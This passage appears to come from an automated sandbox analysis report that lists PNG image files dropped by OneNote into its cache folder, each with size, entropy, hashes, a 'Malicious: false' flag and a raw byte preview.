Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
